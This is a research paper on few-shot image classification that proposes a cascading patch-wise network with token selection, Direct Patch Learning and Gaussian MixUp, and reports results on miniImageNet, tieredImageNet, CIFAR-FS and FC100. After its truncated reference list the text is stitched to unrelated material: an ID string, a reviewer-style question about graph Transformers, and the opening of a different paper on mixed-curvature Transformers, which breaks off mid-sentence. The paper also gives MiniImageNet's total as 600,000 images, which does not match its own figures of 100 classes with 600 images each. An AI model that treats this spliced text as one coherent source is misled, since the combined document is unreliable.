INTRODUCTION Few-shot Learning (FSL) is a highly challenging task, which aims to adapt to new tasks using a very small amount of labeled data. In recent years, many methods (Finn et al., 2017; Vinyals et al., 2016a; Tran et al., 2020a; Chen et al., 2019; Jamal & Qi, 2019; Hao et al., 2019; Li et al., 2019; Qiao et al., 2019; Sun et al., 2019; Rodríguez et al., 2020; Jelley et al., 2022) have been proposed to tackle this problem. Most few-shot methods contain two stages, meta-training, and meta-testing. After pre-training a backbone on the base set in meta-training, the method’s performance on novel classes is evaluated on lots of few-shot tasks during meta-testing. Few-shot learning can be categorized as transductive and inductive methods. Their difference is that transductive methods add the novel set as unlabeled data to the base set. This paper will focus on the more general inductive method. Some recent studies (Hiller et al., 2022; Zhang et al., 2020; He et al., 2022; Lifchitz et al., 2019; Huang et al., 2021) have shown that patch-based methods benefit few-shot learning. DeepEMD (Zhang et al., 2020) regarded each patch as a component of an object. The similarity used for classification is calculated by optimal matching between patches. However, the Hungarian algorithm for solving the optimal matching is computationally expensive. Densecls (Lifchitz et al., 2019) trained each local patch using an image-level label to promote consistent predictions across different patches. Overall, it has been argued in previous object-oriented few-shot work that a complete classification task can be achieved using only the part in which the object resides. However, certain patches, so-called background patches, might contain overlapping objects and richer semantic information, which the model did not entirely leverage during training, further limiting its performance. Based on the thoughts above, Tokmakov et al. (2019) introduced background attributes in a limited way to enable background learning. However, this research trend has not resulted in a viable end-to-end learning model. Figure 1: Guided-backpropagation (Springenberg et al., 2015) visualization of our strategy. The second column confirms the phenomena mentioned by motivation in Sec 3.1, that there is indeed ignorance of annotated parts within objects (body and tails) and non-annotated parts beyond objects (grassland). These phenomena were mitigated by our proposed strategy. To tackle these concerns, we propose a multi-stage end-to-end framework, named Cascading Patch-Wise Network. The overall framework comprises \( n \) successive token selections along with self-supervised learning loss. The token selection strategy separates tokens into “top tokens” and “bottom tokens”, based on the ranking scores. In foreground learning (basically the top tokens after the first selection), we propose two methods, Direct Patch Learning (DPL) and Gaussian Mixup (GMIX). DPL operates on particular local foreground patch tokens, while GMIX offers patch-level labels to DPL by mixing different patches. In contrast, we utilize self-supervised learning to each level of bottom tokens to further learn the image’s structural information and increase data utilization efficiency, thereby enhancing the model’s robust representation capabilities. In summary, our main contributions are: • An end-to-end Cascading Patch-Wise Network for fully utilizing the contextual information for few-shot learning is proposed. Based on such a network, our method makes significant improvements on its baseline and proves the potential value of non-annotated parts. • The token selection strategy is implemented to divide the learning process into “top tokens” and “bottom tokens”. The employment of self-supervised learning to acquire knowledge from the “bottom tokens” brings effective utilization of the available data. • Direct Patch Learning along with Gaussian Mixup is utilized to balance the learning of diverse features and improve the representational capacity of local tokens. By demonstrating the visualization results of local tokens’ activation areas, we validate the efficacy of Direct Patch Learning. 2 RELATED WORK Meta-learning. Meta-learning is the dominant paradigm in few-shot learning, which makes the model generalize to new tasks better by constructing multiple learning tasks. Researchers have proposed many meta-learning methods (Finn et al., 2017; Koch et al., 2015; Snell et al., 2017a; Vinyals et al., 2016a; Oreshkin et al., 2018b). Some other methods (Chen et al., 2019; Lee et al., 2019b; Tian et al., 2020b; Mangla et al., 2020) focus on pre-training a better backbone, and the few-shot classification problem was solved through a linear classifier or metric learning. In this paper, we pay more attention to training an efficient backbone and improving the generalization ability of the model to novel categories. Patch-based Method. LMPNet (Huang et al., 2021) considered a local token as a local descriptor, calculates the distance between each pair of tokens in two images, and takes the average distance of all pairs as the matching score for the images. DeepEMD (Zhang et al., 2020) followed a similar idea as LMPNet (Huang et al., 2021), but it computes the matching score for image tokens using optimal matching. It needs to solve an optimal matching problem during training, which is computationally expensive. Densecls (Lifchitz et al., 2019) trained each local patch with an image-level label to encourage the same prediction over different patches. Our work here takes a different approach, aiming to strengthen the representational ability of tokens and better exploit knowledge from given limited data. Self-supervised learning in FSL. In papers of Gidaris et al. (2019), He et al. (2022), Hiller et al. (2022), Su et al. (2020), self-supervised methods were introduced for few-shot learning, and they indicated that supervised learning provides inferior performance compared with self-supervised methods in few-shot scenarios. We adopt the self-supervised method DINO (Caron et al., 2021), iBot (Zhou et al., 2022), DINoV2 (Oquab et al., 2023) to squeeze residual information beyond the annotated object. Finally, the three methods are compared visually and quantitatively. Cascading learning. HCT (He et al., 2022) used spectral clustering to perform pooling on patches so that the model learns at different semantic levels. Similar to ours, HCT uses the framework of self-supervised learning methods to achieve SOTA performance. But our motivation and method are still different from HCT (detailed in Appendix A). 3 METHOD 3.1 DEFINITION AND MOTIVATION Definition: Few-shot classification involves dividing the dataset into two distinct sets, denoted as \(D_{base}\) and \(D_{novel}\). The former set, \(D_{base}\), is utilized to conduct meta-training, which is a process of training a model to learn how to learn. When testing, few-shot testing task is constructed on \(D_{novel}\), it contains a tuple \((D_{support}, D_{query})\). If \(D_{support}\) contains \(K\) classes and each class has \(N\) samples, it is called a \(K\)-way-\(N\)-shot task. Motivation: 1) “Shortcut” effect of the annotated objects. For a targeted object, networks prefer discriminating it by only part of patches. In layman’s terms, not only can an elephant’s trunk be used as a foreground feature to judge an elephant, but so can its legs and ears. So if a balanced learning scenario is not constructed for the foreground patches, the robustness is reduced. 2) “Unused residual information” beyond the annotated objects. These parts of the image with no class labels also hold a prior probability which brings limited learning value. Optimisation goals: Overall, we constructed different cascading weight redistribution strategies for the patch ranked by token selection. For the object itself, we alleviate the shortcut effect that occurs when a certain patch is too easy to be recognized. For low-ranked patches that contain even less information, a cascading iterative method is used to squeeze out the residual information. Our overall pipeline is illustrated in Fig 2. Multiple token selection module (Sec 3.2) is used to distinguish “top tokens” from “bottom tokens”. Generally, only the top and bottom tokens after the first selection can be interpreted as foreground and background. To alleviate “Shortcut” effect of the annotated object, the Direct Patch Learning (Sec 3.3) is proposed for the foreground, which is only used after the first selection. Finally, the cascading self-supervised learning strategy (Sec 3.4) will squeeze limited information patch-wisely out of the rest of the bottom tokens. Figure 3: Patches of the first token selection. Patches with brighter masks are selected as top patches for Direct Patch Learning, while patches with darker masks are considered bottom patches that serve as input for the second selection, which is utilized for mining background information. 3.2 Token Selection Since the motivation in Sec. 3.1 mentions the need to build a supervised representation of the unlabelled part of the image, it is natural to think of the currently popular self-supervised learning method, which will be also discussed in Sec. 3.4 and Appendix A. Then, further research on DINO (Caron et al., 2021), iBot (Zhou et al., 2022) and DINOv2 (Oquab et al., 2023) points out that the self-attention map of [cls] tokens highlights the areas where the foreground object is located, and suppresses the background area. Inspired by this, we present a feature selection mechanism based on Random Walk that distinguishes “top tokens” from “bottom tokens” in the current context. Furthermore, we do not merely discard the bottom tokens but employ self-supervised learning to mine the structural information inherent in the image, which we find beneficial for few-shot learning. The token selection strategy is where tokens with high relativity with [cls] token are selected as top tokens for patch-level supervision training, while those with lower relativity are used as input for the next encoder to learn background representation. Fig. 3 illustrates a visualized example of the token selection process. To select tokens that are most closely associated with the [cls] token (i.e., top tokens), it is necessary to determine the degree of relevance between the [cls] token and patch tokens. Inspired by the PageRank (Page et al., 1998) algorithm, we consider different tokens as states and attention scores as the probability transition matrix between states, then construct a Markov chain. Starting from the state corresponding to [cls], after s steps, we obtain the distribution of states $\pi_s$, formalized as follows: $$\pi_s = \pi_{s-1}A = \pi_0A^s,$$ (1) where $\pi_0 = \{0, 0, ..., 0, 1\}$, meaning it starts from the state corresponding to the [cls] token, $A$ is a probability transition matrix from the average attention score of all heads in a multi-head transformer. In our final setting, we set $s = 3$. Finally, we rank the probability distribution of states, removing the top half of tokens with the highest probabilities. The remaining tokens proceed to the next encoder for further learning. An intuitive explanation for this approach is that higher probabilities indicate a stronger association between the corresponding patch tokens and the [cls] token. Since the [cls] token encodes the features of a specific object in the current context, we exclude these tokens, allowing the next encoder to focus on learning from the remaining tokens. Then to extract the limited information from the remaining bottom tokens, self-supervised learning methods and cascade learning strategy are applied. The process of self-supervised learning is introduced and analyzed in Sec. 3.4 and Sec. 4.4. 3.3 Direct Patch Learning The “Shortcut effect” is still illustrated by the example of an elephant and its trunk below. Empirically speaking, an elephant can be identified easily by its distinctive trunk alone. An object $x$ can be described as a set of features $[t_1, t_2, \ldots, t_n]$, where $t_i$ can be parameterized as a function of $x$, $[t_1, \ldots t_n] = f_\theta(x)$. Typically, in classical deep learning classification, the features are not explicitly separated, and the conditional distribution $p(y | x)$ is the model’s direct output. In few-shot learning, learning only the salient features of the base class during meta-training may not be sufficient as saliency implies its strong correlation with a specific base class and will not provide effective discriminative features when dealing with novel classes. Let \( t_1 \) represent the feature of the trunk, and \( t_2 \) represent the feature of the skin texture. Due to the strong correlation between the \( t_1 \) and the elephant, we can observe \[ 1 \approx p(y = \text{elephant} \mid t_1, t_2) \approx p(y \mid t_1) = p(y \mid t_1) + 0 \cdot p(y \mid t_2). \] (2) If \( t_2 \) is the output of the neural network, learning of \( t_2 \) can be weak or non-existent, resulting in overfitting on the base classes. Essentially, this scenario can be seen as weighted learning of features, which can select features according to the class feature bias, suppress weakly correlated outputs, and benefit the classification of base classes. However, as training progresses, performance on base classes tends to improve at the expense of the ability to discriminate among novel classes (Chen et al., 2021). Although data augmentation techniques such as RandCrop can reduce this risk to some extent, we aim to further reduce this risk at the model level. In order to address this issue, we transform the original learning objective, which is \( p(y|x) = p(y|t_1, t_2, ..., t_n) \), into multiple balanced weak classifiers \( p(y|t_i) \). For each weak classifier, only a single feature is utilized to construct the classifier, thus the modeling objective becomes: \[ p(y \mid x) = \frac{1}{n} \sum_{i \leq n} p(y \mid t_i). \] (3) We pursue this approach for two main purposes. Firstly, it helps reduce overfitting to the base class by imposing additional constraints. Secondly, it promotes balanced learning of different features and minimizes the occurrence of “shortcuts”. The desired situation is that \( t_i \) in the features set has diverse semantic information and can be separated for optimizing using Eq[3]. However, for common classification tasks, features \( t_i \) are highly entangled. Separately considering these features is intractable. We use the local patches’ representations as \( t_i \) since patches in one image naturally represent some local attributions. Specifically, we can let \( t_i \) be a feature vector from a convolutional network or a token from a transformer that describes the corresponding local area. LMPNet (Huang et al., 2021) also considered a local token as a local descriptor, however, their purpose is more similar to that of DeepEMD (Zhang et al., 2020), which used a local token to compute matching scores between two images. Our aim is to construct a feature-diverse classification model that weakens the suppression of weakly correlated features and enhances the generalization ability to novel classes. Based on Jensen’s inequality and Eq[3], we define the Direct Patch Learning loss function as: \[ L_{DPL} := -\frac{1}{n} \sum_i \mathbb{E}(\log(p(y \mid t_i))) \geq -\mathbb{E}(\log(\frac{1}{n} \sum_i p(y \mid t_i))). \] (4) That is, we optimize the upper bound of cross-entropy for the unweighted feature model, making the computation tractable. ### 3.4 Patch-wise Learning Strategy **Patch-level Label.** In the few-shot classification task, only the image-level annotations are available. Besides, a local patch might contain multiple overlapping objects, such as a sheep grazing on a grassland. If this patch’s label is simply assigned as “sheep”, the learning of grassland features would be ignored. To alleviate this problem, we propose Gaussian MixUp (GMIX). Instead of using a scalar to mix two images, we use a mixing matrix generated from Gaussian Distribution, as shown in Fig[4]. Therefore there exist patches with complex mixed semantics and hard labels are replaced by soft labels. **n-th cascading patch-wise learning strategy.** In the first stage, after token selection for the outputs from the first encoder, we obtain foreground-relevant and background-relevant patch sets \( P_f \) and \( P_b \). Patch-level supervision loss involves only the foreground tokens from the student network, denoted as \( P_f^{(s)} = (t_1, ..., t_n) \): \[ L_{DPL} = -\frac{1}{n} \sum_i \mathbb{E}(\log(p(y \mid t_i))). \] (5) Figure 4: Gaussian MixUp for Patch-level Label. The loss function is denoted by $L$, where $z$ represents the class label and $y$ denotes the network output. The GMIX algorithm generates pixel weights through two randomly generated Gaussian functions, which are utilized to blend two images and produce soft labels for Direct Patch Learning. For [cls] tokens, we used a self-supervised method and loss ($L_{ssl}$) in the multiple papers like DINO (Caron et al., 2021), iBot (Zhou et al., 2022) and DINOv2 (Oquab et al., 2023) for self-supervised training. The loss used in the first stage is defined as $$L^{1th} = L_{ssl}^{1th} + L_{DPL}. \quad (6)$$ Instead of being discarded, those semantically irrelevant bottom tokens $P_b$ will be used as input for the second encoder for further mining of the rich contextual information inherent in the image. The [cls] token from the $n^{th}$ stage will only be used for self-supervised loss computation (detailed in Appendix A) as in the previous stage. Then the total loss is $$L^{n^{th}} = L_{ssl}^{n^{th}} + L_{DPL} + \alpha L_{ssl}^{n^{th}}, \quad (7)$$ while $\alpha$ is the degradation hyper-parameter. We presented an overall pipeline in Algorithm 1 where we omitted GMIX for the sake of simplicity. During testing, only the output of the first encoder is utilized, and the average of foreground tokens and [cls] token is concated as the final feature vector. A cosine classifier is constructed to perform the few-shot classification task. **Algorithm 1 Training pipeline** $\theta_s$, $\theta_t$ are the teacher network and student network’ parameters. ``` 1: for each epoch $\in [0, total\_epochs)$ do 2: for each iteration do 3: $L \leftarrow L_{DPL}$ 4: if epoch > stage1\_epoch then 5: for each $n^{th} \in total\_layers$ do 6: $L \leftarrow L + \alpha L_{ssl}^{n^{th}}$ 7: end for 8: end if 9: $\theta_s \leftarrow \theta_s - lr * \frac{\partial L}{\partial \theta_s}$ 10: $z \leftarrow z - lr * \frac{\partial L}{\partial z}$ 11: $\theta_t \leftarrow \theta_t * momentum + \theta_s * (1 - momentum)$ 12: end for 13: end for ``` ### 4 EXPERIMENT #### 4.1 DATASET MiniImageNet (Vinyals et al., 2016b) is a subset of the ImageNet (Deng et al., 2009) dataset. It comprises 100 classes, out of which 64, 16, and 24 are used for training, validation, and testing, respectively. Each class in MiniImageNet consists of 600 images, resulting in a total of 600,000 images. TieredImageNet (Ren et al., 2018) is also a subset of ImageNet and represents an extension of MiniImageNet, encompassing 600 classes, of which 351, 97, and 160 classes are allocated to the training, validation, and testing splits, respectively. TieredImageNet contains 779,165 images totally. CIFAR-FS (Bertinetto et al., 2018) divides the 100 classes in the CIFAR-100 dataset into training, validation, and testing sets, each consisting of 64, 16, and 20 classes, respectively. Each category in CIFAR-FS contains 600 images. FC100 (Oreshkin et al., 2018a) is also derived from the CIFAR-100 dataset, but the distribution of categories across the training, validation, and testing sets is more diverse, rendering the task more challenging. ### 4.2 IMPLEMENTATION DETAILS The AdamW optimizer is employed with linear learning rate warm-up along with the cosine scheduler of learning rate. Our experiments are conducted on 8 Nvidia V100 GPUs over a period of 400 epochs. And a multi-crop strategy from DINO is also implemented, which includes 2 global images and 8 local images. Our method is evaluated on three different architectures, namely ResNet18, EfficientNet-b0, and ViT-S (detailed in Appendix A). For ResNet18, we set the global image resolution to $224 \times 224$ and the local patch resolution to $96 \times 96$. For EfficientNet-b0, we set the global image resolution to $384 \times 384$ and the local resolution to $144 \times 144$. In cascading learning, the training is conducted in two stages. In the first stage, the backbone and the first encoder are trained for 300 epochs. In the second stage, all network components are trained until 400 epochs. The loss weight $\alpha$ in Algorithm 1 is set to 0.1. For the remaining settings, we follow the original self-supervised model implementation. In our evaluation, a standard evaluation protocol is employed as described in (Mangla et al., 2020; He et al., 2022; Tian et al., 2020b). We construct a cosine classifier to solve few-shot tasks and evaluate our experiments on 5-way 1-shot and 5-way 5-shot classification. For each task, 1 or 5 labeled images are used as support data, and the remaining unlabeled images of the same category are used as query data. In this paper, we sample 2,000 testing tasks for performance evaluation. ![Visualization results of features extracted from the network on the miniImageNet. Our scheme has better classification boundaries on the validation set.](image) **Figure 5:** Visualization results of features extracted from the network on the miniImageNet. Our scheme has better classification boundaries on the validation set. ### 4.3 COMPARISON #### Results of miniImageNet and tieredImageNet. Table 1 displays the results obtained on miniImageNet and tieredImageNet. Our proposed method outperforms previous state-of-the-art methods that also use simple CNN (such as ResNet12) on all benchmarks. It is noteworthy that a significant improvement over the second-best method is achieved. Specifically, in the 5-way-1-shot setting, our method outperforms AMTNet (Lai et al., 2022) by 2.07% on miniImageNet, and in the 5-way-5-shot setting, it surpasses MCL (Liu et al., 2022) by 2.91%. The results on MiniImagenet and TieredImageNet are presented in Table 1. Some recent methods use heavyweight backbones like ViT and Swin, which perform well but require a large amount of data to avoid overfitting. While our method with EfficientNet-B0 achieved state-of-the-art performance with better efficiency (in Appendix A, Table 6). Based on our method, modern backbone like EfficientNet have higher performance, but large backbones like ViT only achieve relatively good results (also detailed and analyzed in Appendix A). Our approach allows the model to better utilize information in the dataset, and improve performance on novel thoughts. #### Results of CIFAR and FC-100. Table 2 shows the result on CIFAR and FC-100 dataset, we all achieved optimal or suboptimal performance. Moreover, cross domain results are also carried out and reach SOTA (detailed in Appendix A). Overall, the SOTA results are achieved in most of the scenarios in inductive few-shot learning. Although in a few other cases, we only achieved relatively good results. It’s still enough to prove the effectiveness and efficiency that ours achieved higher throughput and relatively good performance using a lighter-weight network. Table 1: Comparison on miniImagenet and tieredImageNet. Bold numbers indicate the best performance, blue number indicates sub-optimal performance. For a fairer comparison, we put the method using the traditional CNN (ResNet12) on top and the method using the new architecture at the bottom. | Method | Backbone | miniImageNet 5-way | tieredImageNet 5-way | |-------------------------|----------|--------------------|----------------------| | | | 1-shot (%) | 5-shot (%) | | Variational FSL | ResNet-12| 61.23±0.26 | 77.69±0.17 | | MetaOptNet | ResNet-12| 62.64±0.61 | 78.63±0.64 | | Fine-tuning | WRN-28-10| 57.73±0.62 | 78.17±0.49 | | Neg-Cosine | ResNet-12| 63.85±0.81 | 81.57±0.56 | | Rethinking-distill | ResNet-12| 64.82±0.60 | 82.14±0.43 | | Meta-Baseline | ResNet-12| 63.17±0.23 | 79.26±0.17 | | FEAT | ResNet-12| 66.78±0.20 | 82.05±0.14 | | DeepEMD | ResNet-12| 65.91±0.82 | 82.41±0.56 | | LookingWider | ResNet-12| 67.96±0.98 | 83.36±0.51 | | ECS | ResNet-12| 66.82±0.80 | 84.35±0.51 | | PAL | ResNet-12| 69.37±0.64 | 84.40±0.44 | | FRN | ResNet-12| 66.45±0.19 | 82.83±0.13 | | LDA | ResNet-12| 67.76±0.46 | 82.71±0.31 | | SeFeat | ResNet-12| 68.32±0.62 | 82.71±0.46 | | MCL | ResNet-12| 69.31±n/a | 85.11±n/a | | LIF | ResNet-12| 68.94±0.28 | 85.07±0.50 | | AMTNet | WRN-28 | 70.05±0.46 | 84.55±0.29 | | Baseline | ResNet-12| 62.74±0.44 | 79.61±0.36 | | Ours | ResNet-12| 72.12±0.40 | 88.02±0.28 | | FewTURE | Swin-Tiny| 72.40±0.78 | 86.38±0.49 | | HCTransformers | ViT-S×2 | 74.62±0.20 | 89.19±0.13 | | Baseline | EfficientNet-B0| 62.74±0.44 | 79.61±0.36 | | Ours | EfficientNet-B0| 74.84±0.36 | 89.84±0.30 | Table 2: Comparison on CIFAR-FS and FC100. | Method | Backbone | CIFAR-FS 5-way | FC100 5-way | |-------------------------|----------|----------------|-------------| | | | 1-shot (%) | 5-shot (%) | | Shot-Free | ResNet-12| 69.2±n/a | 84.7±n/a | | TEWAM | ResNet-12| 70.4±n/a | 81.3±n/a | | Prototypical Networks | ResNet-12| 72.2±0.7 | 83.5±0.5 | | MetaOptNet | ResNet-12| 72.6±0.7 | 84.3±0.5 | | Rethinking | ResNet-12| 73.9±0.8 | 86.9±0.5 | | ECS | ResNet-12| 76.8±0.8 | 89.2±0.6 | | PAL | ResNet-12| 77.1±0.7 | 88.0±0.5 | | DeepEMD | ResNet-12| 74.5±0.3 | 86.4±0.4 | | Baseline | ResNet-12| 70.2±0.4 | 83.0±0.3 | | Ours | ResNet-12| 78.1±0.4 | 89.9±0.4 | | FewTURE | Swin-Tiny| 77.8±0.8 | 88.9±0.6 | | HCTransformers | ViT-S | 78.9±0.2 | 90.5±0.1 | | Baseline | EfficientNet-B0| 71.3±0.4 | 83.2±0.3 | | Ours | EfficientNet-B0| 79.2±0.4 | 92.0±0.4 | 4.4 Ablation Study Table 3 shows the ablation experiments on miniImagenet with ResNet12 as the backbone. MP and DPL bring a great performance improvement by 8.85% on the miniImageNet 5-way-1-shot setting compared with the DINoV2 baseline. GMIX can further improve the accuracy by 1.47% (1-shot). With all these proposed strategies, we surpass the supervised baseline by 9.38% (1-shot). Fig 5 visualizes the embedding space of the dataset. After training with our strategies, the embeddings of | SL SSL DPL GMIX Cascading Selection | 1-shot (%) | 5-shot (%) | |-------------------------------------|------------|------------| | ✓ - - - - - - | 62.74±0.44 | 79.61±0.36 | | ✓ - ✓ - - - - | 61.50±0.44 | 78.13±0.36 | | - ✓ ✓ - - - - | 70.35±0.40 | 85.61±0.39 | | - ✓ ✓ ✓ - - - | 71.82±0.40 | 86.57±0.37 | | - ✓ ✓ ✓ ✓ - - | 72.12±0.40 | 88.02±0.28 | Table 3: Ablation study. Baseline is trained with SL(Supervised learning), we surpass it by a large margin of 9.38% (1-shot) and 8.41% (5-shot). | Stage of Cascade | DINo | iBot | DINoV2 | |------------------|------|------|--------| | n = 1 stage | 70.51±0.38 | 71.14±0.37 | 71.82±0.40 | | n = 2 stages | 71.22±0.41 | 71.87±0.37 | 72.12±0.40 | | n = 3 stages | 71.16±0.38 | 71.72±0.40 | 71.78±0.39 | | n = 4 stages | 71.02±0.39 | 71.78±0.41 | 71.89±0.40 | Table 4: Comparison of Stage of Cascading Token Selection and SSL method 5-way-1-shot results (%) of miniImageNet. the validation set become more concentrated and exhibit clearer classification boundaries, indicating that our method has better generalization abilities over novel categories. **Input Resolution.** For datasets with lower resolution, such as CIFAR, the improvement on performance is not that significant. As pointed out by (He et al., 2022), the patch-based method is not effective on datasets with low resolution. To investigate the impact of resolution on performance, experiments were conducted on different resolution inputs, and the results are shown in Fig 6. This figure also demonstrates that only increasing the resolution may not have positive effects for some methods, as also noted by (He et al., 2022). These experiments suggest that the improvement in performance is not solely attributable to the increase in resolution. Instead, it is the robust backbone trained with our proposed stronger regularization strategies that matter the most in reducing the risk of overfitting. ![Comparison of different input resolutions](image) **Figure 6:** Comparison of different input resolutions. ![Visualization of local patch token activation regions of two models](image) **Figure 7:** Visualization of local patch token activation regions of two models | Strategy | Backbone | 1-shot (%) | 5-shot (%) | |----------------|------------|------------|------------| | All | ResNet-12 | 71.44±0.42 | 87.64±0.31 | | TokenSelection | ResNet-12 | 72.12±0.40 | 88.02±0.28 | **Table 5:** Comparison of different token selection strategies on miniImageNet. **Number of cascading stages and self-supervise methods:** Experiments Table 4 have shown that all self-supervised methods give the best results when number of stage \( n=2 \). Moreover, among all the self-supervised methods, DINOv2 gives the best results. Therefore, DINOv2 is used in all cases where other results are not specifically mentioned. **Token Selection Strategy.** Table 5 presents our experiments on validating the design of the token selection strategy. We denote using tokens with higher attention scores for Direct Patch Learning loss as TokenSelection and using all the tokens as All. In the results of the miniImageNet dataset, it is observed that training with a token selection strategy demonstrates better performance. We attribute such a phenomenon to the irrelevant semantic information contained in other tokens from background regions. **Activation Region of Direct Patch Learning.** It is observed that the model trained using DPL exhibits a larger activation region for local patch tokens. The receptive field of a deep neural network is theoretically large enough to cover the entire input space. Therefore, using image-level features, such as global pooled features in CNN or the \([cls]\) token in ViT, is adequate to activate the object’s entire region, and local tokens are only required to activate their respective local areas. Moreover, directly using global features for training may not benefit generalization to new classes for the model may mainly focus the most significant features on the base classes. When facing novel classes, these features may not be discriminative enough. Through Direct Patch Learning, the model learns different features from one sample more independently. This approach helps avoid overfitting to base classes by learning a more varied set of features. ## 5 Conclusions This paper introduces a cascading learning framework for few-shot learning that divides the learning process patch-wise using a token selection. The goal is to enhance the representational capacity of tokens and better leverage the knowledge available from limited data. Our approach demonstrates strong performance with a minimal increase in computational cost. Furthermore, the GMIX modules and patch-wise strategy can be easily integrated into other tasks as plug-and-play modules. Overall, both the insight of the non-annotated part and cascading patch-wise learning strategy is still enlightening to the community. REFERENCES Arman Afrasiyabi, Hugo Larochelle, Jean-François Lalonde, and Christian Gagné. Matching feature sets for few-shot image classification. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 9014–9024, 2022. Luca Bertinetto, Joao F Henriques, Philip HS Torr, and Andrea Vedaldi. Meta-learning with differentiable closed-form solvers. arXiv preprint arXiv:1805.08136, 2018. Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In Proceedings of the International Conference on Computer Vision (ICCV), 2021. Wei-Yu Chen, Yen-Cheng Liu, Zsolt Kira, Yu-Chiang Frank Wang, and Jia-Bin Huang. A closer look at few-shot classification. arXiv preprint arXiv:1904.04232, 2019. Yinbo Chen, Zhuang Liu, Huijuan Xu, Trevor Darrell, and Xiaolong Wang. Meta-baseline: Exploring simple meta-learning for few-shot learning. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 9062–9071, 2021. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In 2009 IEEE conference on computer vision and pattern recognition, pp. 248–255. Ieee, 2009. Guneet S Dhillon, Pratik Chaudhari, Avinash Ravichandran, and Stefano Soatto. A baseline for few-shot image classification. arXiv preprint arXiv:1909.02729, 2019. Chelsea Finn, Pieter Abbeel, and Sergey Levine. Model-agnostic meta-learning for fast adaptation of deep networks. In International conference on machine learning, pp. 1126–1135. PMLR, 2017. Spyros Gidaris, Andrei Bursuc, Nikos Komodakis, Patrick Pérez, and Matthieu Cord. Boosting few-shot visual learning with self-supervision. In Proceedings of the IEEE International Conference on Computer Vision, 2019. Fusheng Hao, Fengxiang He, Jun Cheng, Lei Wang, Jianzhong Cao, and Dacheng Tao. Collect and select: Semantic alignment metric learning for few-shot learning. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 8460–8469, 2019. Yangji He, Weihan Liang, Dongyang Zhao, Hong-Yu Zhou, Weifeng Ge, Yizhou Yu, and Wenqiang Zhang. Attribute surrogates learning and spectral tokens pooling in transformers for few-shot learning. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 9119–9129, June 2022. Markus Hiller, Rongkai Ma, Mehrtash Harandi, and Tom Drummond. Rethinking generalization in few-shot classification. arXiv preprint arXiv:2206.07267, 2022. Hongwei Huang, Zhangkai Wu, Wenbin Li, Jing Huo, and Yang Gao. Local descriptor-based multi-prototype network for few-shot learning. Pattern Recognition, 116:107935, 2021. ISSN 0031-3203. Muhammad Abdullah Jamal and Guo-Jun Qi. Task agnostic meta-learning for few-shot learning. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 11719–11727, 2019. Adam Jelley, Amos Storkey, Antreas Antoniou, and Sam Devlin. Contrastive meta-learning for partially observable few-shot learning. In The Eleventh International Conference on Learning Representations, 2022. Gregory Koch, Richard Zemel, Ruslan Salakhutdinov, et al. Siamese neural networks for one-shot image recognition. In ICML deep learning workshop, volume 2, pp. 0. Lille, 2015. Jinxiang Lai, Siqian Yang, Guannan Jiang, Xi Wang, Yuxi Li, Zihui Jia, Xiaochen Chen, Jun Liu, Bin-Bin Gao, Wei Zhang, et al. Rethinking the metric in few-shot learning: From an adaptive multi-distance perspective. In Proceedings of the 30th ACM International Conference on Multimedia, pp. 4021–4030, 2022.
AN5uo4ByWH
You claim Euclidean Transformers are inadequate for modeling hierarchical and cyclic graphs. However, recent works like Graphormer show strong performance on tasks like molecular property prediction that involve such structures. Can you provide more concrete evidence on the limitations of existing methods? Comparisons to recent graph Transformers on suitable benchmarks would help make this case.
Curve Your Attention: Mixed-Curvature Transformers for Graph Representation Learning Anonymous authors Paper under double-blind review Abstract Real-world graphs naturally exhibit hierarchical trees and cyclic structures that are unfit for the typical Euclidean space. While there exist graph neural networks that utilize hyperbolic or spherical spaces towards embedding such structures more accurately, these methods are confined under the message-passing paradigm, making them vulnerable against side-effects such as oversmoothing and oversquashing. More recent work have proposed global attention-based graph Transformers that can alleviate such drawbacks and easily model long-range interactions, but their extensions towards non-Euclidean geometry are yet unexplored. To bridge this gap, we propose Fully Product-Stereographic Transformer, a generalization of Transformers towards operating entirely on the product of constant curvature spaces. When combined with tokenized graph Transformers, our model can learn the curvature appropriate for the input graph in an end-to-end fashion, without any additional tuning on different curvature initializations. We also provide a kernelized approach to non-Euclidean attention, which enables our model to run with computational cost linear to the number of nodes and edges while respecting the underlying geometry. Experiments on graph reconstruction and node classification demonstrate the benefits of generalizing Transformers to the non-Euclidean domain. 1 Introduction Learning from graph-structured data is a challenging task in machine learning, with various downstream applications that involve modeling individual entities and relational interactions among them (Sen et al., 2008; Watts & Strogatz, 1998; Gleich et al., 2004). A dominant line of work consists of graph convolutional networks (GCNs) that aggregate features across graph neighbors through message-passing (Gilmer et al., 2017; Kipf & Welling, 2016; Veličković et al., 2017; Wu et al., 2019; Hamilton et al., 2017). While most GCNs learn features that lie on the typical Euclidean space with zero curvature, real-world graphs often comprise of complex structures such as hierarchical trees and cycles that Euclidean space requires excessive dimensions to accurately embed (Sala et al., 2018). In response, the graph learning community has developed generalizations of GCNs to spaces with non-zero curvature such as hyperbolic, spherical, or mixed-curvature spaces with both negative and positive curvatures (Chami et al., 2019; Liu et al., 2019; Bachmann et al., 2020; Xiong et al., 2022). Unfortunately, non-Euclidean GCNs are not immune to harmful side-effects of message-passing such as oversmoothing (Oono & Suzuki, 2019; Cai & Wang, 2020; Yang et al., 2022) and oversquashing (Topping et al., 2021; Alon & Yahav, 2020). These drawbacks make it difficult to stack GCN layers towards large depths, limiting its expressive power (Feng et al., 2022; Maron et al., 2019) as well as predictive performance on tasks that require long-range interactions to solve (Dwivedi et al., 2022; Liu et al., 2021). To cope with such limitations, recent work have instead proposed Transformer-based graph encoders that can easily exchange information across long-range distances through global self-attention (Kim et al., 2022; Ying et al., 2021; Dwivedi & Bresson, 2020; Kreuzer et al., 2021). However, existing graph Transformers are still confined within the Euclidean regime, and their extensions towards non-Euclidean geometry has not yet been studied. In this paper, we bridge this gap by generalizing the Transformer architecture (Vaswani et al., 2017) towards non-Euclidean spaces with learnable curvatures. Specifically, we endow each attention head a stereographic model (Bachmann et al., 2020) that can universally represent Euclidean, hyperbolic, and Figure 1: Illustration of our proposed FPS-T architecture. Well-known 